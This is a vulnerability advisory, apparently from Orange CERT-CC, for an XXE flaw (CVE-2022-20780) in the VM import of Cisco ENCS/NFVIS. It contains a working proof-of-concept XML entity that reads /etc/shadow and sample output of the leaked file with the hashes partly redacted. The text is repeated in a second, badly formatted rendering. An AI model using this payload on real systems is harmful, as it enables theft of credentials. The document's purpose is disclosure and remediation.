Overview
ENCS has the capability to export VMs. Configurations and metadata are compressed with the VM image in a .vmbkp archive when vmExportAction command is requested.
The vmImportAction command is also available, allowing to import .vmbkp archives.
This import is vulnerable to an XXE allowing to leak system datas to the CLI and probably to the VM.
Details
The vmImportAction is waiting to a .vmbkp archive. This archive is a simple .tar.gz.
It has to be composed of several files. One of them being dep.xml.
dep.xml is a XML configuration file describing the vm_lifecycle.
An attacker can add an external entity into this XML file. This external entity will be resolved by the EncsManager.
Proof of Concept
In this example we inject the external entity in a variable field of a vm_group that should be resolved with /etc/shadow file.
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/shadow"> ]>
<vm_lifecycle xmlns="http://www.cisco.com/nfvis/vm_lifecycle">
<tenants>
<tenant>
<name>admin</name>
<deployments>
<deployment>
<name>ubuntu1</name>
<vm_group>
<name>ubuntu1</name>
...
<config_data>
...
<configuration>
<dst>user-data</dst>
...
<variable>
<name>xxe</name>
<val>&xxe;</val>
</variable>
</configuration>
</config_data>
</vm_group>
</deployment>
</deployments>
</tenant>
</tenants>
</vm_lifecycle>
It results in /etc/shadow content being displayed in the configuration file.
encs-audit-n# show running-config vm_lifecycle tenants tenant admin deployments deployment ubuntu1 vm_group ubuntu1 config_data configuration variable xxe
vm_lifecycle tenants tenant admin
deployments deployment ubuntu1
vm_group ubuntu1
config_data configuration user-data
variable xxe
val [ "root:$6$TqVe9rHRx8kkXfb$<REDACTED>:18820:0:99999:7:::\nbin:*:18527:0:99999:7:::\ndaemon:*:18527:0:99999:7:::\nadm:*:18527:0:99999:7:::\nlp:*:18527:0:99999:7:::\nsync:*:18527:0:99999:7:::\nshutdown:*:18527:0:99999:7:::\nhalt:*:18527:0:99999:7:::\nmail:*:18527:0:99999:7:::\noperator:*:18527:0:99999:7:::\ngames:*:18527:0:99999:7:::\nftp:*:18527:0:99999:7:::\nnobody:*:18527:0:99999:7:::\nnginx:!!:18820::::::\nsystemd-network:!!:18820::::::\ndbus:!!:18820::::::\npolkitd:!!:18820::::::\nunbound:!!:18820::::::\nrpc:!!:18820:0:99999:7:::\ntss:!!:18820::::::\nqemu:!!:18820::::::\nsaslauth:!!:18820::::::\nopenvswitch:!!:18820::::::\nsshd:!!:18820::::::\ngeoclue:!!:18820::::::\nntp:!!:18820::::::\nchrony:!!:18820::::::\nrpcuser:!!:18820::::::\nnfsnobody:!!:18820::::::\nconsole:!!:18820:0:99999:7:::\ngluster:!!:18820::::::\nradvd:!!:18820::::::\nldap:!!:18820::::::\ndockerroot:!!:18820::::::\ntomcat:!!:18820::::::\npostgres:!!:18820::::::\ntcpdump:!!:18820::::::\npostfix:!!:18820::::::\nbird:!!:18820::::::\nadmin:$6$W56YPo/BPFohgh97$<REDACTED>:18820:0:99999:7:::\n" ]
!
!
!
!
!
Solution
Security patch
Upgrade to Cisco Enterprise NFVIS v4.7.1
Workaround
We recommand to disable external entity resolution in XML parser.
References
https://nvd.nist.gov/vuln/detail/CVE-2022-20780
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-NFVIS-MUL-7DySRX9
Credits
Orange CERT-CC
Cyrille CHATRAS at Orange group
Loic RESTOUX at Orange group
Pierre DENOUEL at Orange group
Timeline
Date reported: September 16, 2021
Date fixed: May 4, 2022
Overview
ENCS has the capability to export VMs. Configurations and metadata are compressed with the VM image in a
.vmbkparchive whenvmExportActioncommand is requested.The
vmImportActioncommand is also available, allowing to import.vmbkparchives.This import is vulnerable to an XXE allowing to leak system datas to the CLI and probably to the VM.
Details
The
vmImportActionis waiting to a.vmbkparchive. This archive is a simple.tar.gz.It has to be composed of several files. One of them being
dep.xml.dep.xmlis a XML configuration file describing thevm_lifecycle.An attacker can add an external entity into this XML file. This external entity will be resolved by the EncsManager.
Proof of Concept
In this example we inject the external entity in a
variablefield of avm_groupthat should be resolved with/etc/shadowfile.It results in
/etc/shadowcontent being displayed in the configuration file.Solution
Security patch
Upgrade to Cisco Enterprise NFVIS v4.7.1
Workaround
We recommand to disable external entity resolution in XML parser.
References
https://nvd.nist.gov/vuln/detail/CVE-2022-20780
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-NFVIS-MUL-7DySRX9
Credits
Orange CERT-CC
Cyrille CHATRAS at Orange group
Loic RESTOUX at Orange group
Pierre DENOUEL at Orange group
Timeline
Date reported: September 16, 2021
Date fixed: May 4, 2022